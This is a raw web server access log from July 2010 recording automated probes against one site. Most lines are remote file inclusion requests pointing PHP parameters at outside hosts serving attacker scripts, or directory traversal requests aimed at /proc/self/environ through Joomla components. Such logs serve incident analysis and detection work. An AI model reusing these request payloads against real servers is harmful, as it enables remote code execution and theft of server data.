92.103.254.153 - - [01/Jul/2010:15:15:00 -0700] "GET //?_SERVER[DOCUMENT_ROOT]=http://t0l.fileave.com/byroe/fxid1.txt??? HTTP/1.1" 200 779 "-" "Mozilla/5.0" "www.de-construction.com"
92.103.254.153 - - [01/Jul/2010:15:15:00 -0700] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://t0l.fileave.com/byroe/fxid1.txt??? HTTP/1.1" 200 1373 "-" "Mozilla/5.0" "www.de-construction.com"
92.103.254.153 - - [01/Jul/2010:15:15:06 -0700] "GET /logs/access_100501.log///?_SERVER[DOCUMENT_ROOT]=http://t0l.fileave.com/byroe/fxid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
85.17.199.105 - - [01/Jul/2010:15:15:14 -0700] "GET /logs//index.php?option=com_remository&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.de-construction.com"
85.17.199.105 - - [01/Jul/2010:15:15:14 -0700] "GET /index.php?option=com_remository&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.de-construction.com"
92.103.254.153 - - [01/Jul/2010:15:16:48 -0700] "GET /logs/access_100531.log///?_SERVER[DOCUMENT_ROOT]=http://t0l.fileave.com/byroe/fxid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
92.103.254.153 - - [01/Jul/2010:15:16:49 -0700] "GET /logs/access_100601.log///?_SERVER[DOCUMENT_ROOT]=http://t0l.fileave.com/byroe/fxid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
85.17.199.105 - - [01/Jul/2010:15:17:01 -0700] "GET /logs//index.php?option=com_remository&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.de-construction.com"
85.17.199.105 - - [01/Jul/2010:15:17:01 -0700] "GET /index.php?option=com_remository&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.de-construction.com"
85.17.199.105 - - [01/Jul/2010:15:17:50 -0700] "GET /logs//index.php?option=com_remository&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.de-construction.com"
85.17.199.105 - - [01/Jul/2010:15:17:51 -0700] "GET /index.php?option=com_remository&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.de-construction.com"
148.233.85.135 - - [01/Jul/2010:15:18:17 -0700] "GET /logs//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.de-construction.com"
148.233.85.135 - - [01/Jul/2010:15:18:18 -0700] "GET /index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.de-construction.com"
148.233.85.135 - - [01/Jul/2010:15:18:49 -0700] "GET /logs/access.log//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.de-construction.com"
148.233.85.135 - - [01/Jul/2010:15:20:20 -0700] "GET /logs/access_100601.log//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.de-construction.com"
148.233.85.135 - - [01/Jul/2010:15:20:25 -0700] "GET /index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.de-construction.com"
148.233.85.135 - - [01/Jul/2010:15:20:27 -0700] "GET /logs//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.de-construction.com"
148.233.85.135 - - [01/Jul/2010:15:21:19 -0700] "GET /logs//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.de-construction.com"
148.233.85.135 - - [01/Jul/2010:15:21:24 -0700] "GET /index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.de-construction.com"
66.249.71.142 - - [01/Jul/2010:15:29:42 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.de-construction.com"
66.191.139.210 - - [01/Jul/2010:15:36:42 -0700] "GET /logs/access_100601.log//poll/png.php?include_path=http://www.yangsheng.ru/board/fx29id.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
66.191.139.210 - - [01/Jul/2010:15:36:47 -0700] "GET /poll/png.php?include_path=http://www.yangsheng.ru/board/fx29id.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
66.191.139.210 - - [01/Jul/2010:15:36:47 -0700] "GET /logs//poll/png.php?include_path=http://www.yangsheng.ru/board/fx29id.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
66.191.139.210 - - [01/Jul/2010:15:36:48 -0700] "GET /logs//poll/png.php?include_path=http://www.yangsheng.ru/board/fx29id.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
66.191.139.210 - - [01/Jul/2010:15:36:48 -0700] "GET /logs/access_100601.log//poll/png.php?include_path=http://www.yangsheng.ru/board/fx29id.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
66.191.139.210 - - [01/Jul/2010:15:36:48 -0700] "GET /poll/png.php?include_path=http://www.yangsheng.ru/board/fx29id.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
202.60.234.22 - - [01/Jul/2010:16:07:47 -0700] "GET /logs/access_100601.log//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.de-construction.com"
85.17.199.105 - - [01/Jul/2010:16:08:55 -0700] "GET /logs//index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.de-construction.com"
85.17.199.105 - - [01/Jul/2010:16:08:55 -0700] "GET /index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.de-construction.com"
85.17.199.105 - - [01/Jul/2010:16:09:02 -0700] "GET /logs//index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.de-construction.com"
85.17.199.105 - - [01/Jul/2010:16:09:02 -0700] "GET /index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.de-construction.com"
85.17.199.105 - - [01/Jul/2010:16:09:18 -0700] "GET /logs/access_100531.log//index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.de-construction.com"
85.17.199.105 - - [01/Jul/2010:16:09:18 -0700] "GET /index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.de-construction.com"
85.17.199.105 - - [01/Jul/2010:16:09:18 -0700] "GET /logs//index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.de-construction.com"
85.17.199.105 - - [01/Jul/2010:16:09:46 -0700] "GET /logs//index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.de-construction.com"
85.17.199.105 - - [01/Jul/2010:16:09:46 -0700] "GET /index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.de-construction.com"
85.17.199.105 - - [01/Jul/2010:16:10:02 -0700] "GET /logs//index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.de-construction.com"
85.17.199.105 - - [01/Jul/2010:16:10:02 -0700] "GET /index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.de-construction.com"
85.17.199.105 - - [01/Jul/2010:16:10:05 -0700] "GET /logs//index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.de-construction.com"
85.17.199.105 - - [01/Jul/2010:16:10:06 -0700] "GET /index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.de-construction.com"
85.17.199.105 - - [01/Jul/2010:16:10:12 -0700] "GET /logs//index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.de-construction.com"
85.17.199.105 - - [01/Jul/2010:16:10:13 -0700] "GET /index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.de-construction.com"
85.17.199.105 - - [01/Jul/2010:16:10:20 -0700] "GET /logs//index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.de-construction.com"
85.17.199.105 - - [01/Jul/2010:16:10:20 -0700] "GET /index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.de-construction.com"
211.63.60.50 - - [01/Jul/2010:16:10:31 -0700] "GET /?_PHPLIB[libdir]=http://phamsight.com/docs/images/head?? HTTP/1.1" 200 779 "-" "Mozilla/5.0" "www.de-construction.com"
211.63.60.50 - - [01/Jul/2010:16:10:31 -0700] "GET /logs/access_100531.log//?_PHPLIB[libdir]=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
211.63.60.50 - - [01/Jul/2010:16:10:31 -0700] "GET /logs//?_PHPLIB[libdir]=http://phamsight.com/docs/images/head?? HTTP/1.1" 200 1372 "-" "Mozilla/5.0" "www.de-construction.com"
211.63.60.50 - - [01/Jul/2010:16:11:22 -0700] "GET /logs/access_100531.log//?_PHPLIB[libdir]=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
211.63.60.50 - - [01/Jul/2010:16:11:22 -0700] "GET /logs//?_PHPLIB[libdir]=http://phamsight.com/docs/images/head?? HTTP/1.1" 200 1372 "-" "Mozilla/5.0" "www.de-construction.com"
211.63.60.50 - - [01/Jul/2010:16:11:22 -0700] "GET /?_PHPLIB[libdir]=http://phamsight.com/docs/images/head?? HTTP/1.1" 200 779 "-" "Mozilla/5.0" "www.de-construction.com"
85.17.199.105 - - [01/Jul/2010:16:11:38 -0700] "GET /logs//index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.de-construction.com"
85.17.199.105 - - [01/Jul/2010:16:11:38 -0700] "GET /index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.de-construction.com"
85.17.199.105 - - [01/Jul/2010:16:12:38 -0700] "GET /logs//index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.de-construction.com"
85.17.199.105 - - [01/Jul/2010:16:12:38 -0700] "GET /index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.de-construction.com"
85.17.199.105 - - [01/Jul/2010:16:13:51 -0700] "GET /logs//index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.de-construction.com"
85.17.199.105 - - [01/Jul/2010:16:13:51 -0700] "GET /index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.de-construction.com"
211.63.60.50 - - [01/Jul/2010:16:19:27 -0700] "GET /logs/access_100601.log%20%20//?_PHPLIB[libdir]=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
211.63.60.50 - - [01/Jul/2010:16:19:27 -0700] "GET /logs//?_PHPLIB[libdir]=http://phamsight.com/docs/images/head?? HTTP/1.1" 200 1372 "-" "Mozilla/5.0" "www.de-construction.com"
211.63.60.50 - - [01/Jul/2010:16:19:28 -0700] "GET /?_PHPLIB[libdir]=http://phamsight.com/docs/images/head?? HTTP/1.1" 200 779 "-" "Mozilla/5.0" "www.de-construction.com"
211.63.60.50 - - [01/Jul/2010:16:19:29 -0700] "GET /logs//?_PHPLIB[libdir]=http://phamsight.com/docs/images/head?? HTTP/1.1" 200 1372 "-" "Mozilla/5.0" "www.de-construction.com"
211.63.60.50 - - [01/Jul/2010:16:19:29 -0700] "GET /?_PHPLIB[libdir]=http://phamsight.com/docs/images/head?? HTTP/1.1" 200 779 "-" "Mozilla/5.0" "www.de-construction.com"
211.63.60.50 - - [01/Jul/2010:16:19:29 -0700] "GET /logs/access_100601.log%20%20//?_PHPLIB[libdir]=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
66.191.139.210 - - [01/Jul/2010:16:19:42 -0700] "GET /logs/access_100601.log/home.php?index=http://www.yangsheng.ru/board/fx29id.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
66.191.139.210 - - [01/Jul/2010:16:19:42 -0700] "GET /logs/home.php?index=http://www.yangsheng.ru/board/fx29id.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
66.191.139.210 - - [01/Jul/2010:16:19:42 -0700] "GET /home.php?index=http://www.yangsheng.ru/board/fx29id.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
200.125.196.34 - - [01/Jul/2010:16:25:47 -0700] "GET /logs//index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.de-construction.com"
200.125.196.34 - - [01/Jul/2010:16:25:47 -0700] "GET /index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.de-construction.com"
216.131.96.193 - - [01/Jul/2010:16:26:58 -0700] "GET /logs//components/com_moofaq/includes/file_includer.php?gzip=0&file=http://www.porto.napoli.it/tt/data/p1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
216.131.96.193 - - [01/Jul/2010:16:26:58 -0700] "GET /components/com_moofaq/includes/file_includer.php?gzip=0&file=http://www.porto.napoli.it/tt/data/p1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
200.125.196.34 - - [01/Jul/2010:16:27:02 -0700] "GET /logs//index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.de-construction.com"
200.125.196.34 - - [01/Jul/2010:16:27:02 -0700] "GET /index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.de-construction.com"
216.131.96.193 - - [01/Jul/2010:16:27:03 -0700] "GET /logs/access.log//components/com_moofaq/includes/file_includer.php?gzip=0&file=http://www.porto.napoli.it/tt/data/p1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
200.125.196.34 - - [01/Jul/2010:16:27:21 -0700] "GET /logs//index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.de-construction.com"
200.125.196.34 - - [01/Jul/2010:16:27:22 -0700] "GET /index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.de-construction.com"
85.17.199.105 - - [01/Jul/2010:16:35:05 -0700] "GET /logs/index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.de-construction.com"
85.17.199.105 - - [01/Jul/2010:16:35:05 -0700] "GET /index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.de-construction.com"
69.70.153.210 - - [01/Jul/2010:16:36:06 -0700] "GET /logs//login.php?dir=http://t7.fileave.com/e107.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.de-construction.com"
69.70.153.210 - - [01/Jul/2010:16:36:07 -0700] "GET /login.php?dir=http://t7.fileave.com/e107.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.de-construction.com"
85.17.199.105 - - [01/Jul/2010:16:36:21 -0700] "GET /logs/access_100531.log/index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.de-construction.com"
85.17.199.105 - - [01/Jul/2010:16:36:21 -0700] "GET /index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.de-construction.com"
85.17.199.105 - - [01/Jul/2010:16:36:21 -0700] "GET /logs/index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.de-construction.com"
85.17.199.105 - - [01/Jul/2010:16:36:58 -0700] "GET /logs/index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.de-construction.com"
85.17.199.105 - - [01/Jul/2010:16:36:58 -0700] "GET /index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.de-construction.com"
85.17.199.105 - - [01/Jul/2010:16:37:41 -0700] "GET /logs/index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.de-construction.com"
85.17.199.105 - - [01/Jul/2010:16:37:42 -0700] "GET /index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.de-construction.com"
85.17.199.105 - - [01/Jul/2010:16:38:26 -0700] "GET /logs/access_100531.log/index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.de-construction.com"
85.17.199.105 - - [01/Jul/2010:16:38:26 -0700] "GET /index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.de-construction.com"
85.17.199.105 - - [01/Jul/2010:16:38:27 -0700] "GET /logs/index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.de-construction.com"
85.17.199.105 - - [01/Jul/2010:16:38:58 -0700] "GET /logs/index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.de-construction.com"
85.17.199.105 - - [01/Jul/2010:16:38:59 -0700] "GET /index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.de-construction.com"
85.17.199.105 - - [01/Jul/2010:16:39:45 -0700] "GET /logs/index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.de-construction.com"
85.17.199.105 - - [01/Jul/2010:16:39:45 -0700] "GET /index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.de-construction.com"
85.17.199.105 - - [01/Jul/2010:16:40:08 -0700] "GET /logs/?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1367 "-" "libwww-perl/5.831" "www.de-construction.com"
85.17.199.105 - - [01/Jul/2010:16:40:09 -0700] "GET /?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 779 "-" "libwww-perl/5.831" "www.de-construction.com"
85.17.199.105 - - [01/Jul/2010:16:41:34 -0700] "GET /logs//index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.de-construction.com"
85.17.199.105 - - [01/Jul/2010:16:41:34 -0700] "GET /index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.de-construction.com"
85.17.199.105 - - [01/Jul/2010:16:43:05 -0700] "GET /logs/access_100531.log/index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.de-construction.com"
85.17.199.105 - - [01/Jul/2010:16:43:05 -0700] "GET /index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.de-construction.com"
85.17.199.105 - - [01/Jul/2010:16:43:05 -0700] "GET /logs/index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.de-construction.com"
213.189.224.16 - - [01/Jul/2010:17:13:11 -0700] "GET /components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.gracefellowshiptv.com/lecture/photoshop/color_word_files/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
213.189.224.16 - - [01/Jul/2010:17:13:11 -0700] "GET /logs/components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.gracefellowshiptv.com/lecture/photoshop/color_word_files/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
